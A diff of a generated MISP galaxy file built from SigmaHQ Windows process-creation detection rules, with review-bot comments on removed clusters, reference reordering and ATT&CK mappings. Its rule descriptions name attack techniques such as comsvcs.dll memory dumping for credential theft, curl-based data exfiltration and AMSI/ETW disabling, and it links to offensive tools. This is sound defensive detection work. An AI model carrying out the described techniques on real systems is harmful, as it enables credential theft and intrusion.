- "author": "Florian Roth (Nextron Systems), Markus Neis",
- "creation_date": "2020/02/01",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0044"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb",
- "value": "Winnti Malware HK University Campaign"
- },
{
"description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)",
"meta": {
@@ -55735,11 +54027,11 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/shantanukhande/status/1229348874298388484",
- "https://twitter.com/Wietze/status/1542107456507203586",
+ "https://twitter.com/pythonresponder/status/1385064506049630211?s=21",
"https://twitter.com/SBousseaden/status/1167417096374050817",
"https://twitter.com/Hexacorn/status/1224848930795552769",
+ "https://twitter.com/Wietze/status/1542107456507203586",
"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
- "https://twitter.com/pythonresponder/status/1385064506049630211?s=21",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"
],
"tags": [
@@ -55782,9 +54074,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
- "https://www.fortiguard.com/threat-signal-report/4718?s=09",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
+ "https://www.fortiguard.com/threat-signal-report/4718?s=09",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"
],
"tags": [
@@ -55850,8 +54142,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml"
],
"tags": [
@@ -55885,11 +54177,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/christophetd/status/1164506034720952320",
"https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
"https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
- "https://twitter.com/christophetd/status/1164506034720952320",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml"
],
"tags": [
@@ -55990,12 +54282,12 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
"https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
"https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner",
"https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml"
],
"tags": [
@@ -56036,8 +54328,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml"
],
"tags": [
@@ -56071,11 +54363,11 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/eral4m/status/1479080793003671557",
- "https://twitter.com/Hexacorn/status/885258886428725250",
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
"https://twitter.com/nas_bench/status/1433344116071583746",
"https://twitter.com/eral4m/status/1479106975967240209",
"http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/",
- "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://twitter.com/Hexacorn/status/885258886428725250",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"
],
"tags": [
@@ -56108,8 +54400,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
"https://adsecurity.org/?p=2288",
+ "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml"
],
"tags": [
@@ -56142,8 +54434,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml"
],
"tags": [
@@ -56176,9 +54468,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml"
],
"tags": [
@@ -56356,9 +54648,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
"https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0",
"https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
+ "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml"
],
"tags": [
@@ -56378,58 +54670,6 @@
"uuid": "efec536f-72e8-4656-8960-5e85d091345b",
"value": "Set Suspicious Files as System Files Using Attrib.EXE"
},
- {
- "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom Ueltschi",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_notpetya.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/schroedingers-petya/78870/",
- "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011",
- "attack.t1070.001",
- "attack.credential_access",
- "attack.t1003.001",
- "car.2016-04-002"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1",
- "value": "NotPetya Ransomware Activity"
- },
{
"description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).",
"meta": {
@@ -56660,40 +54900,6 @@
"uuid": "90d50722-0483-4065-8e35-57efaadd354d",
"value": "Arbitrary MSI Download Via Devinit.EXE"
},
- {
- "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/03/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_26857_msexchange.yml"
- ],
- "tags": [
- "attack.t1203",
- "attack.execution",
- "cve.2021.26857"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887",
- "value": "Potential CVE-2021-26857 Exploitation Attempt"
- },
{
"description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n",
"meta": {
@@ -56727,40 +54933,6 @@
"uuid": "f548a603-c9f2-4c89-b511-b089f7e94549",
"value": "Potential Persistence Via Microsoft Compatibility Appraiser"
},
- {
- "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Maxime Thiebaut",
- "creation_date": "2021/08/23",
- "falsepositive": [
- "User selecting a different installation folder (check for other sub processes of this explorer.exe process)"
- ],
- "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/j0nh4t/status/1429049506021138437",
- "https://streamable.com/q2dsji",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_razorinstaller_lpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1553"
- ]
- },
- "related": [
- {
- "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167",
- "value": "Suspicious RazerInstaller Explorer Subprocess"
- },
{
"description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary",
"meta": {
@@ -56774,8 +54946,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1463526834918854661",
"https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5",
+ "https://twitter.com/mrd0x/status/1463526834918854661",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"
],
"tags": [
@@ -56810,10 +54982,10 @@
"logsource.product": "windows",
"refs": [
"https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
- "https://twitter.com/cyberwar_15/status/1187287262054076416",
- "https://blog.alyac.co.kr/1901",
"https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
+ "https://blog.alyac.co.kr/1901",
"https://en.wikipedia.org/wiki/Hangul_(word_processor)",
+ "https://twitter.com/cyberwar_15/status/1187287262054076416",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
],
"tags": [
@@ -57019,42 +55191,6 @@
"uuid": "242301bc-f92f-4476-8718-78004a6efd9f",
"value": "DLL Loaded via CertOC.EXE"
},
- {
- "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/11/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_41379.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/",
- "https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/",
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
- "https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_41379.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61",
- "value": "Potential CVE-2021-41379 Exploitation Attempt"
- },
{
"description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file",
"meta": {
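Review bot: Deleting cluster `af8bbce4-f751-46b4-8d91-82a33a736f61` outright is a breaking change for any MISP instance that has already tagged events with it, and nothing in the hunk says the upstream rule was retired rather than moved. The `refs` entry still points at `rules/windows/process_creation/proc_creation_win_exploit_cve_2021_41379.yml`; if that file now lives under a different upstream directory (the same removal pattern hits every `apt_`, `malware_` and `exploit_cve_` rule in this diff while the generic LOLBIN entries stay), the generator's path filter is what needs fixing, so the UUID and its `related` link carrying the `attack.t1068` mapping survive. If the rule really was retired, say so in the change description and consider keeping the entry with a deprecation marker instead of dropping it.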
@@ -57068,9 +55204,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/nas_bench/status/1534957360032120833",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
"https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
- "https://twitter.com/nas_bench/status/1534957360032120833",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"
],
"tags": [
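Review bot: The `refs` reorder here, repeated in most hunks of this diff, is pure churn: the new order is not alphabetical (the `twitter.com/nas_bench` link now sits above the `lolbas-project.github.io` link) and, judging by the other hunks, not stable between generator runs either; only the trailing sigma URL keeps its place. Emit `refs` in a deterministic order (sort them, keeping the canonical sigma rule link last if that is intentional) so that future diffs show only real changes to rule content and reviewers can spot the removed clusters without wading through reshuffles.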
@@ -57120,8 +55256,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/HiwinCN/HTran",
"https://github.com/cw1997/NATBypass",
+ "https://github.com/HiwinCN/HTran",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml"
],
"tags": [
@@ -57156,8 +55292,8 @@
"logsource.product": "windows",
"refs": [
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml"
],
"tags": [
@@ -57377,41 +55513,6 @@
"uuid": "f64e5c19-879c-4bae-b471-6d84c8339677",
"value": "Webshell Recon Detection Via CommandLine & Processes"
},
- {
- "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_susp_children.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.execution",
- "attack.t1218"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "63f3605b-979f-48c2-b7cc-7f90523fed88",
- "value": "Potential Suspicious Child Process Of 3CXDesktopApp"
- },
{
"description": "Execute VBscript code that is referenced within the *.bgi file.",
"meta": {
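Review bot: Cluster `63f3605b-979f-48c2-b7cc-7f90523fed88` was created on 2023/03/29 for the 3CXDesktopApp supply chain compromise and is dropped here only weeks later; that is far too early for a detection to be retired, so this looks like the generator losing track of a relocated file rather than an upstream deletion. Please verify before merging; if `proc_creation_win_malware_3cx_compromise_susp_children.yml` still exists upstream under a different path, keep the cluster (and its `related` link) and update `filename` and `refs` instead.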
@@ -57509,8 +55610,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase",
"https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml"
],
"tags": [
@@ -57543,9 +55644,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml"
],
"tags": [
@@ -57633,6 +55734,48 @@
"uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d",
"value": "UAC Bypass Using IEInstal - Process"
},
+ {
+ "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_hktl_stracciatella_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mgeeky/Stracciatella",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1059",
+ "attack.t1562.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7a4d9232-92fc-404d-8ce1-4c92e7caf539",
+ "value": "HackTool - Stracciatella Execution"
+ },
{
"description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI",
"meta": {
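Review bot: The new cluster `7a4d9232-92fc-404d-8ce1-4c92e7caf539` links to the parent technique `attack.t1059` (dest-uuid `7385dfaf-6886-4229-9ecd-6fd678040830`) although the description is specifically about a PowerShell runspace launched from C#, i.e. the PowerShell sub-technique T1059.001; the `attack.t1562.001` link (dest-uuid `ac08589e-ee59-4935-8667-d845e38fe579`) for the AMSI/ETW/Script Block Logging bypass is the right one. Both tags are copied from the upstream rule, so the precision fix belongs in SigmaHQ rather than in this galaxy, but it is worth raising upstream because consumers pivot on these dest-uuids. Minor: "Powershell" in the description is upstream text as well.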
@@ -57785,7 +55928,7 @@
{
"description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
+ "author": "Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)",
"creation_date": "2020/07/03",
"falsepositive": [
"Scripts created by developers and admins"
@@ -57797,8 +55940,8 @@
"refs": [
"https://twitter.com/d1r4c/status/1279042657508081664",
"https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://curl.se/docs/manpage.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_fileupload.yml"
],
"tags": [
@@ -57840,8 +55983,8 @@
"logsource.product": "windows",
"refs": [
"https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/",
- "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
"http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt",
+ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml"
],
"tags": [
@@ -57942,8 +56085,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/nao_sec/status/1530196847679401984",
- "https://twitter.com/_JohnHammond/status/1531672601067675648",
"https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/_JohnHammond/status/1531672601067675648",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"
],
"tags": [
@@ -58101,10 +56244,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
"https://twitter.com/SBousseaden/status/1211636381086339073",
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
+ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
],
"tags": [
@@ -58222,8 +56365,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
"https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
+ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml"
],
"tags": [
@@ -58322,11 +56465,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml"
],
@@ -58419,8 +56562,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
"https://github.com/carlospolop/PEASS-ng",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml"
],
"tags": [
@@ -58503,8 +56646,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/subTee/status/1216465628946563073",
"https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26",
+ "https://twitter.com/subTee/status/1216465628946563073",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml"
],
"tags": [
@@ -58573,10 +56716,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
"https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
- "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
"https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
+ "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
+ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml"
],
"tags": [
@@ -58609,8 +56752,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"
],
"tags": [
@@ -58643,9 +56786,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
"https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/",
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
